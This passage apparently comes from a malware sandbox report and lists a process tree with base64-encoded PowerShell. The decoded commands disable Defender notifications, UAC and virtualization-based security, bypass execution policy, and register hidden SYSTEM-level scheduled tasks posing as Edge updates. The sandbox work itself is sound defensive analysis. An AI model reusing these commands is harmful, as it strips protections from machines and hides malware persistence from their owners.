cAYQByAGUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABFAHgAcABsAG8AcgBlAHIAIgAgAC0ATgBhAG0AZQAgACIARABpAHMAYQBiAGwAZQBOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBDAGUAbgB0AGUAcgAiACAALQBUAHkAcABlACAARABXAG8AcgBkACAALQBWAGEAbAB1AGUAIAAxACAALQBGAG8AcgBjAGUACgAKAE4AZQB3AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACIASABLAEwATQA6AFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAARABlAGYAZQBuAGQAZQByACAAUwBlAGMAdQByAGkAdAB5ACAAQwBlAG4AdABlAHIAIgAgAC0ATgBhAG0AZQAgACIATgBvAHQAaQBmAGkAYwBhAHQAaQBvAG4AcwAiACAALQBGAG8AcgBjAGUACgBOAGUAdwAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAAIgBIAEsATABNADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAIABTAGUAYwB1AHIAaQB0AHkAIABDAGUAbgB0AGUAcgBcAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAHMAIgAgAC0ATgBhAG0AZQAgACIARABpAHMAYQBiAGwAZQBFAG4AaABhAG4AYwBlAGQATgBvAHQAaQBmAGkAYwBhAHQAaQBvAG4AcwAiACAALQBQAHIAbwBwAGUAcgB0AHkAVAB5AHAAZQAgACIARABXAG8AcgBkACIAIAAtAFYAYQBsAHUAZQAgADEAIAAtAEYAbwByAGMAZQAKAFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAiAEgASwBMAE0AOgBcAFMATwBGAFQAVwBBAFIARQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgAgAFMAZQBjAHUAcgBpAHQAeQAgAEMAZQBuAHQAZQByAFwATgBvAHQAaQBmAGkAYwBhAHQAaQBvAG4AcwAiACAALQBOAGEAbQBlACAAIgBEAGkAcwBhAGIAbABlAEUAbgBoAGEAbgBjAGUAZABOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBzACIAIAAtAFQAeQBwAGUAIABEAFcAbwByAGQAIAAtAFYAYQBsAHUAZQAgADEAIAAtAEYAbwByAGMAZQAKAE4AZQB3AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACIASABLAEMAVQA6AFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAARABlAGYAZQBuAGQAZQByACAAUwBlAGMAdQByAGkAdAB5ACAAQwBlAG4AdABlAHIAIgAgAC0ATgBhAG0AZQAgACIATgBvAHQAaQBmAGkAYwBhAHQAaQBvAG4AcwAiACAALQBGAG8AcgBjAGUACgBOAGUAdwAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAAIgBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAIABTAGUAYwB1AHIAaQB0AHkAIABDAGUAbgB0AGUAcgBcAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAHMAIgAgAC0ATgBhAG0AZQAgACIARABpAHMAYQBiAGwAZQBFAG4AaABhAG4AYwBlAGQATgBvAHQAaQBmAGkAYwBhAHQAaQBvAG4AcwAiACAALQBQAHIAbwBwAGUAcgB0AHkAVAB5AHAAZQAgACIARABXAG8AcgBkACIAIAAtAFYAYQBsAHUAZQAgADEAIAAtAEYAbwByAGMAZQAKAFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAiAEgASwBDAFUAOgBcAFMATwBGAFQAVwBBAFIARQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgAgAFMAZQBjAHUAcgBpAHQAeQAgAEMAZQBuAHQAZQByAFwATgBvAHQAaQBmAGkAYwBhAHQAaQBvAG4AcwAiACAALQBOAGEAbQBlACAAIgBEAGkAcwBhAGIAbABlAEUAbgBoAGEAbgBjAGUAZABOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBzACIAIAAtAFQAeQBwAGUAIABEAFcAbwByAGQAIAAtAFYAYQBsAHUAZQAgADEAIAAtAEYAbwByAGMAZQAKAAoATgBlAHcALQBJAHQAZQBtACAALQBQAGEAdABoACAAIgBIAEsATABNADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAIABTAGUAYwB1AHIAaQB0AHkAIABDAGUAbgB0AGUAcgAiACAALQBOAGEAbQBlACAAIgBOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBzACIAIAAtAEYAbwByAGMAZQAKAE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAiAEgASwBMAE0AOgBcAFMATwBGAFQAVwBBAFIARQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgAgAFMAZQBjAHUAcgBpAHQAeQAgAEMAZQBuAHQAZQByAFwATgBvAHQAaQBmAGkAYwBhAHQAaQBvAG4AcwAiACAALQBOAGEAbQBlACAAIgBEAGkAcwBhAGIAbABlAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAHMAIgAgAC0AUAByAG8AcABlAHIAdAB5AFQAeQBwAGUAIAAiAEQAVwBvAHIAZAAiACAALQBWAGEAbAB1AGUAIAAxACAALQBGAG8AcgBjAGUACgBTAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAAIgBIAEsATABNADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAIABTAGUAYwB1AHIAaQB0AHkAIABDAGUAbgB0AGUAcgBcAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAHMAIgAgAC0ATgBhAG0AZQAgACIARABpAHMAYQBiAGwAZQBOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBzACIAIAAtAFQAeQBwAGUAIABEAFcAbwByAGQAIAAtAFYAYQBsAHUAZQAgADEAIAAtAEYAbwByAGMAZQAKAE4AZQB3AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACIASABLAEMAVQA6AFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAARABlAGYAZQBuAGQAZQByACAAUwBlAGMAdQByAGkAdAB5ACAAQwBlAG4AdABlAHIAIgAgAC0ATgBhAG0AZQAgACIATgBvAHQAaQBmAGkAYwBhAHQAaQBvAG4AcwAiACAALQBGAG8AcgBjAGUACgBOAGUAdwAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAAIgBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAIABTAGUAYwB1AHIAaQB0AHkAIABDAGUAbgB0AGUAcgBcAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAHMAIgAgAC0ATgBhAG0AZQAgACIARABpAHMAYQBiAGwAZQBOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBzACIAIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAAIgBEAFcAbwByAGQAIgAgAC0AVgBhAGwAdQBlACAAMQAgAC0ARgBvAHIAYwBlAAoAUwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgACIASABLAEMAVQA6AFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAARABlAGYAZQBuAGQAZQByACAAUwBlAGMAdQByAGkAdAB5ACAAQwBlAG4AdABlAHIAXABOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBzACIAIAAtAE4AYQBtAGUAIAAiAEQAaQBzAGEAYgBsAGUATgBvAHQAaQBmAGkAYwBhAHQAaQBvAG4AcwAiACAALQBUAHkAcABlACAARABXAG8AcgBkACAALQBWAGEAbAB1AGUAIAAxACAALQBGAG8AcgBjAGUACgAKAE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAiAEgASwBMAE0AOgBcAFMAbwBmAHQAdwBhAHIAZQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAFAAbwBsAGkAYwBpAGUAcwBcAFMAeQBzAHQAZQBtACIAIAAtAE4AYQBtAGUAIAAiAEUAbgBhAGIAbABlAEwAVQBBACIAIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAARABXAG8AcgBkACAALQBWAGEAbAB1AGUAIAAwACAALQBGAG8AcgBjAGUACgBTAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAAIgBIAEsATABNADoAXABTAG8AZgB0AHcAYQByAGUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABQAG8AbABpAGMAaQBlAHMAXABTAHkAcwB0AGUAbQAiACAALQBOAGEAbQBlACAAIgBFAG4AYQBiAGwAZQBMAFUAQQAiACAALQBUAHkAcABlACAARABXAG8AcgBkACAALQBWAGEAbAB1AGUAIAAwACAALQBGAG8AcgBjAGUACgBOAGUAdwAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAAIgBIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABQAG8AbABpAGMAaQBlAHMAXABTAHkAcwB0AGUAbQAiACAALQBOAGEAbQBlACAAIgBFAG4AYQBiAGwAZQBMAFUAQQAiACAALQBQAHIAbwBwAGUAcgB0AHkAVAB5AHAAZQAgAEQAVwBvAHIAZAAgAC0AVgBhAGwAdQBlACAAMAAgAC0ARgBvAHIAYwBlAAoAUwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgACIASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAUABvAGwAaQBjAGkAZQBzAFwAUwB5AHMAdABlAG0AIgAgAC0ATgBhAG0AZQAgACIARQBuAGEAYgBsAGUATABVAEEAIgAgAC0AVAB5AHAAZQAgAEQAVwBvAHIAZAAgAC0AVgBhAGwAdQBlACAAMAAgAC0ARgBvAHIAYwBlAAoACgBOAGUAdwAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAAIgBIAEsATABNADoAXABTAG8AZgB0AHcAYQByAGUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABEAGEAdABhACAAQwBvAGwAbABlAGMAdABpAG8AbgAiACAALQBOAGEAbQBlACAAIgBBAGwAbABvAHcAVABlAGwAZQBtAGUAdAByAHkAIgAgAC0AVgBhAGwAdQBlACAAMQAgAC0AUAByAG8AcABlAHIAdAB5AFQAeQBwAGUAIABEAFcATwBSAEQAIAAtAEYAbwByAGMAZQAKAFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAiAEgASwBMAE0AOgBcAFMAbwBmAHQAdwBhAHIAZQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEQAYQB0AGEAIABDAG8AbABsAGUAYwB0AGkAbwBuACIAIAAtAE4AYQBtAGUAIAAiAEEAbABsAG8AdwBUAGUAbABlAG0AZQB0AHIAeQAiACAALQBUAHkAcABlACAARABXAG8AcgBkACAALQBWAGEAbAB1AGUAIAAxACAALQBGAG8AcgBjAGUACgBOAGUAdwAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAAIgBIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABEAGEAdABhACAAQwBvAGwAbABlAGMAdABpAG8AbgAiACAALQBOAGEAbQBlACAAIgBBAGwAbABvAHcAVABlAGwAZQBtAGUAdAByAHkAIgAgAC0AVgBhAGwAdQBlACAAMQAgAC0AUAByAG8AcABlAHIAdAB5AFQAeQBwAGUAIABEAFcATwBSAEQAIAAtAEYAbwByAGMAZQAKAFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAiAEgASwBDAFUAOgBcAFMAbwBmAHQAdwBhAHIAZQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEQAYQB0AGEAIABDAG8AbABsAGUAYwB0AGkAbwBuACIAIAAtAE4AYQBtAGUAIAAiAEEAbABsAG8AdwBUAGUAbABlAG0AZQB0AHIAeQAiACAALQBUAHkAcABlACAARABXAG8AcgBkACAALQBWAGEAbAB1AGUAIAAxACAALQBGAG8AcgBjAGUACgAKAE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAiAEgASwBMAE0AOgBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAFcAaQBuAGQAbwB3AHMAIABTAGUAYQByAGMAaAAiACAALQBOAGEAbQBlACAAIgBBAGwAbABvAHcAQwBvAHIAdABhAG4AYQAiACAALQBWAGEAbAB1AGUAIAAwACAALQBQAHIAbwBwAGUAcgB0AHkAVAB5AHAAZQAgAEQAVwBPAFIARAAgAC0ARgBvAHIAYwBlAAoAUwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgACIASABLAEwATQA6AFwAUABvAGwAaQBjAGkAZQBzAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAVwBpAG4AZABvAHcAcwAgAFMAZQBhAHIAYwBoACIAIAAtAE4AYQBtAGUAIAAiAEEAbABsAG8AdwBDAG8AcgB0AGEAbgBhACIAIAAtAFQAeQBwAGUAIABEAFcAbwByAGQAIAAtAFYAYQBsAHUAZQAgADAAIAAtAEYAbwByAGMAZQAKAE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAiAEgASwBDAFUAOgBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAFcAaQBuAGQAbwB3AHMAIABTAGUAYQByAGMAaAAiACAALQBOAGEAbQBlACAAIgBBAGwAbABvAHcAQwBvAHIAdABhAG4AYQAiACAALQBWAGEAbAB1AGUAIAAwACAALQBQAHIAbwBwAGUAcgB0AHkAVAB5AHAAZQAgAEQAVwBPAFIARAAgAC0ARgBvAHIAYwBlAAoAUwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgACIASABLAEMAVQA6AFwAUABvAGwAaQBjAGkAZQBzAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAVwBpAG4AZABvAHcAcwAgAFMAZQBhAHIAYwBoACIAIAAtAE4AYQBtAGUAIAAiAEEAbABsAG8AdwBDAG8AcgB0AGEAbgBhACIAIAAtAFQAeQBwAGUAIABEAFcAbwByAGQAIAAtAFYAYQBsAHUAZQAgADAAIAAtAEYAbwByAGMAZQAKAAoATgBlAHcALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgACIASABLAEwATQA6AFwAUwBZAFMAVABFAE0AXABDAHUAcgByAGUAbgB0AEMAbwBuAHQAcgBvAGwAUwBlAHQAXABDAG8AbgB0AHIAbwBsAFwARABlAHYAaQBjAGUARwB1AGEAcgBkACIAIAAtAE4AYQBtAGUAIAAiAEUAbgBhAGIAbABlAFYAaQByAHQAdQBhAGwAaQB6AGEAdABpAG8AbgBCAGEAcwBlAGQAUwBlAGMAdQByAGkAdAB5ACIAIAAtAFYAYQBsAHUAZQAgADAAIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAARABXAE8AUgBEACAALQBGAG8AcgBjAGUACgBTAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAAIgBIAEsATABNADoAXABTAFkAUwBUAEUATQBcAEMAdQByAHIAZQBuAHQAQwBvAG4AdAByAG8AbABTAGUAdABcAEMAbwBuAHQAcgBvAGwAXABEAGUAdgBpAGMAZQBHAHUAYQByAGQAIgAgAC0ATgBhAG0AZQAgACIARQBuAGEAYgBsAGUAVgBpAHIAdAB1AGEAbABpAHoAYQB0AGkAbwBuAEIAYQBzAGUAZABTAGUAYwB1AHIAaQB0AHkAIgAgAC0AVAB5AHAAZQAgAEQAVwBvAHIAZAAgAC0AVgBhAGwAdQBlACAAMAAgAC0ARgBvAHIAYwBlAAoATgBlAHcALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgACIASABLAEMAVQA6AFwAUwBZAFMAVABFAE0AXABDAHUAcgByAGUAbgB0AEMAbwBuAHQAcgBvAGwAUwBlAHQAXABDAG8AbgB0AHIAbwBsAFwARABlAHYAaQBjAGUARwB1AGEAcgBkACIAIAAtAE4AYQBtAGUAIAAiAEUAbgBhAGIAbABlAFYAaQByAHQAdQBhAGwAaQB6AGEAdABpAG8AbgBCAGEAcwBlAGQAUwBlAGMAdQByAGkAdAB5ACIAIAAtAFYAYQBsAHUAZQAgADAAIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAARABXAE8AUgBEACAALQBGAG8AcgBjAGUACgBTAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAAIgBIAEsAQwBVADoAXABTAFkAUwBUAEUATQBcAEMAdQByAHIAZQBuAHQAQwBvAG4AdAByAG8AbABTAGUAdABcAEMAbwBuAHQAcgBvAGwAXABEAGUAdgBpAGMAZQBHAHUAYQByAGQAIgAgAC0ATgBhAG0AZQAgACIARQBuAGEAYgBsAGUAVgBpAHIAdAB1AGEAbABpAHoAYQB0AGkAbwBuAEIAYQBzAGUAZABTAGUAYwB1AHIAaQB0AHkAIgAgAC0AVAB5AHAAZQAgAEQAVwBvAHIAZAAgAC0AVgBhAGwAdQBlACAAMAAgAC0ARgBvAHIAYwBlAAoACgBOAGUAdwAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAAIgBIAEsATABNADoAXABTAFkAUwBUAEUATQBcAEMAdQByAHIAZQBuAHQAQwBvAG4AdAByAG8AbABTAGUAdABcAEMAbwBuAHQAcgBvAGwAXABEAGUAdgBpAGMAZQBHAHUAYQByAGQAIgAgAC0ATgBhAG0AZQAgACIAUgBlAHEAdQBpAHIAZQBQAGwAYQB0AGYAbwByAG0AUwBlAGMAdQByAGkAdAB5AEYAZQBhAHQAdQByAGUAcwAiACAALQBWAGEAbAB1AGUAIAAwACAALQBQAHIAbwBwAGUAcgB0AHkAVAB5AHAAZQAgAEQAVwBPAFIARAAgAC0ARgBvAHIAYwBlAAoAUwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgACIASABLAEwATQA6AFwAUwBZAFMAVABFAE0AXABDAHUAcgByAGUAbgB0AEMAbwBuAHQAcgBvAGwAUwBlAHQAXABDAG8AbgB0AHIAbwBsAFwARABlAHYAaQBjAGUARwB1AGEAcgBkACIAIAAtAE4AYQBtAGUAIAAiAFIAZQBxAHUAaQByAGUAUABsAGEAdABmAG8AcgBtAFMAZQBjAHUAcgBpAHQAeQBGAGUAYQB0AHUAcgBlAHMAIgAgAC0AVAB5AHAAZQAgAEQAVwBvAHIAZAAgAC0AVgBhAGwAdQBlACAAMAAgAC0ARgBvAHIAYwBlAAoATgBlAHcALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgACIASABLAEMAVQA6AFwAUwBZAFMAVABFAE0AXABDAHUAcgByAGUAbgB0AEMAbwBuAHQAcgBvAGwAUwBlAHQAXABDAG8AbgB0AHIAbwBsAFwARABlAHYAaQBjAGUARwB1AGEAcgBkACIAIAAtAE4AYQBtAGUAIAAiAFIAZQBxAHUAaQByAGUAUABsAGEAdABmAG8AcgBtAFMAZQBjAHUAcgBpAHQAeQBGAGUAYQB0AHUAcgBlAHMAIgAgAC0AVgBhAGwAdQBlACAAMAAgAC0AUAByAG8AcABlAHIAdAB5AFQAeQBwAGUAIABEAFcATwBSAEQAIAAtAEYAbwByAGMAZQAKAFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAiAEgASwBDAFUAOgBcAFMAWQBTAFQARQBNAFwAQwB1AHIAcgBlAG4AdABDAG8AbgB0AHIAbwBsAFMAZQB0AFwAQwBvAG4AdAByAG8AbABcAEQAZQB2AGkAYwBlAEcAdQBhAHIAZAAiACAALQBOAGEAbQBlACAAIgBSAGUAcQB1AGkAcgBlAFAAbABhAHQAZgBvAHIAbQBTAGUAYwB1AHIAaQB0AHkARgBlAGEAdAB1AHIAZQBzACIAIAAtAFQAeQBwAGUAIABEAFcAbwByAGQAIAAtAFYAYQBsAHUAZQAgADAAIAAtAEYAbwByAGMAZQAKAAoATgBlAHcALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgACIASABLAEwATQA6AFwAUwBZAFMAVABFAE0AXABDAHUAcgByAGUAbgB0AEMAbwBuAHQAcgBvAGwAUwBlAHQAXABDAG8AbgB0AHIAbwBsAFwAUwBlAHMAcwBpAG8AbgAgAE0AYQBuAGEAZwBlAHIAXABNAGUAbQBvAHIAeQAgAE0AYQBuAGEAZwBlAG0AZQBuAHQAIgAgAC0ATgBhAG0AZQAgACIATABhAHIAZwBlAFAAYQBnAGUATQBpAG4AaQBtAHUAbQAiACAALQBWAGEAbAB1AGUAIAAwACAALQBQAHIAbwBwAGUAcgB0AHkAVAB5AHAAZQAgAEQAVwBPAFIARAAgAC0ARgBvAHIAYwBlAAoAUwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgACIASABLAEwATQA6AFwAUwBZAFMAVABFAE0AXABDAHUAcgByAGUAbgB0AEMAbwBuAHQAcgBvAGwAUwBlAHQAXABDAG8AbgB0AHIAbwBsAFwAUwBlAHMAcwBpAG8AbgAgAE0AYQBuAGEAZwBlAHIAXABNAGUAbQBvAHIAeQAgAE0AYQBuAGEAZwBlAG0AZQBuAHQAIgAgAC0ATgBhAG0AZQAgACIATABhAHIAZwBlAFAAYQBnAGUATQBpAG4AaQBtAHUAbQAiACAALQBUAHkAcABlACAARABXAG8AcgBkACAALQBWAGEAbAB1AGUAIAAwACAALQBGAG8AcgBjAGUACgBOAGUAdwAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAAIgBIAEsAQwBVADoAXABTAFkAUwBUAEUATQBcAEMAdQByAHIAZQBuAHQAQwBvAG4AdAByAG8AbABTAGUAdABcAEMAbwBuAHQAcgBvAGwAXABTAGUAcwBzAGkAbwBuACAATQBhAG4AYQBnAGUAcgBcAE0AZQBtAG8AcgB5ACAATQBhAG4AYQBnAGUAbQBlAG4AdAAiACAALQBOAGEAbQBlACAAIgBMAGEAcgBnAGUAUABhAGcAZQBNAGkAbgBpAG0AdQBtACIAIAAtAFYAYQBsAHUAZQAgADAAIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAARABXAE8AUgBEACAALQBGAG8AcgBjAGUACgBTAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAAIgBIAEsAQwBVADoAXABTAFkAUwBUAEUATQBcAEMAdQByAHIAZQBuAHQAQwBvAG4AdAByAG8AbABTAGUAdABcAEMAbwBuAHQAcgBvAGwAXABTAGUAcwBzAGkAbwBuACAATQBhAG4AYQBnAGUAcgBcAE0AZQBtAG8AcgB5ACAATQBhAG4AYQBnAGUAbQBlAG4AdAAiACAALQBOAGEAbQBlACAAIgBMAGEAcgBnAGUAUABhAGcAZQBNAGkAbgBpAG0AdQBtACIAIAAtAFQAeQBwAGUAIABEAFcAbwByAGQAIAAtAFYAYQBsAHUAZQAgADAAIAAtAEYAbwByAGMAZQAKAA==
                          6⤵
                          • Modifies Windows Defender notification settings
                          • UAC bypass
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of WriteProcessMemory
                          PID:4112
                          • C:\Windows\system32\chcp.com
                            "C:\Windows\system32\chcp.com" 65001
                            7⤵
                              PID:3976
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            powershell.exe -exec bypass -enc YwBoAGMAcAAgADYANQAwADAAMQAKACQAUAByAG8AZwByAGUAcwBzAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAJwBTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACcACgAKAFMAZQB0AC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIAAtAFMAYwBvAHAAZQAgAEMAdQByAHIAZQBuAHQAVQBzAGUAcgAgAEIAeQBwAGEAcwBzACAALQBGAG8AcgBjAGUACgBTAGUAdAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAALQBTAGMAbwBwAGUAIABMAG8AYwBhAGwATQBhAGMAaABpAG4AZQAgAEIAeQBwAGEAcwBzACAALQBGAG8AcgBjAGUACgAKACQAYQBjAHQAaQBvAG4AIAA9ACAATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAEEAYwB0AGkAbwBuACAALQBFAHgAZQBjAHUAdABlACAAIgBCAHIAYQB2AGUAQwByAGEAcwBoAEgAYQBuAGQAbABlAHIALgBlAHgAZQAiACAALQBXAG8AcgBrAGkAbgBnAEQAaQByAGUAYwB0AG8AcgB5ACAAIgAkAGUAbgB2ADoAUABSAE8ARwBSAEEATQBEAEEAVABBAFwAQgByAGEAdgBlAEMAcgBhAHMAaABIAGEAbgBkAGwAZQByAC4AZQB4AGUAIgA7AAoAJAB0AHIAaQBnAGcAZQByAEQAYQBpAGwAeQAgAD0AIABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAVAByAGkAZwBnAGUAcgAgAC0ARABhAGkAbAB5ACAALQBBAHQAIAAiADAAMAA6ADAAMAAiADsACgAkAHQAcgBpAGcAZwBlAHIATABvAGcAbwBuACAAPQAgAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBUAHIAaQBnAGcAZQByACAALQBBAHQATABvAGcATwBuADsACgAkAHMAZQB0AHQAaQBuAGcAcwAgAD0AIABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAUwBlAHQAdABpAG4AZwBzAFMAZQB0ACAALQBBAGwAbABvAHcAUwB0AGEAcgB0AEkAZgBPAG4AQgBhAHQAdABlAHIAaQBlAHMAIAAtAFMAdABhAHIAdABXAGgAZQBuAEEAdgBhAGkAbABhAGIAbABlACAALQBIAGkAZABkAGUAbgAgAC0ARABvAG4AdABTAHQAbwBwAEkAZgBHAG8AaQBuAGcATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBFAHgAZQBjAHUAdABpAG8AbgBUAGkAbQBlAEwAaQBtAGkAdAAgADAAOwAKAFIAZQBnAGkAcwB0AGUAcgAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAIAAtAFQAYQBzAGsATgBhAG0AZQAgACIATQBpAGMAcgBvAHMAbwBmAHQARQBkAGcAZQBVAHAAZABhAHQAZQBUAGEAcwBrAE0AYQBjAGgAaQBuAGUAQwBvAHIAZQB7AEIAOABBAEMAMQA2ADYAOAAtADkANwBEADIALQA0ADIARABCAC0AOQA0AEQAQgAtAEQAMwAyAEQARQA1ADAANQA4ADgAQQAxAH0AIgAgAC0AQQBjAHQAaQBvAG4AIAAkAGEAYwB0AGkAbwBuACAALQBUAHIAaQBnAGcAZQByACAAJAB0AHIAaQBnAGcAZQByAEQAYQBpAGwAeQAsACAAJAB0AHIAaQBnAGcAZQByAEwAbwBnAG8AbgAgAC0AUwBlAHQAdABpAG4AZwBzACAAJABzAGUAdAB0AGkAbgBnAHMAIAAtAFIAdQBuAEwAZQB2AGUAbAAgAEgAaQBnAGgAZQBzAHQAIAAtAFUAcwBlAHIAIAAiAFMAWQBTAFQARQBNACIACgAKACQAYQBjAHQAaQBvAG4AIAA9ACAATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAEEAYwB0AGkAbwBuACAALQBFAHgAZQBjAHUAdABlACAAIgBHAG8AbwBnAGwAZQBDAHIAYQBzAGgASABhAG4AZABsAGUAcgAuAGUAeABlACIAIAAtAFcAbwByAGsAa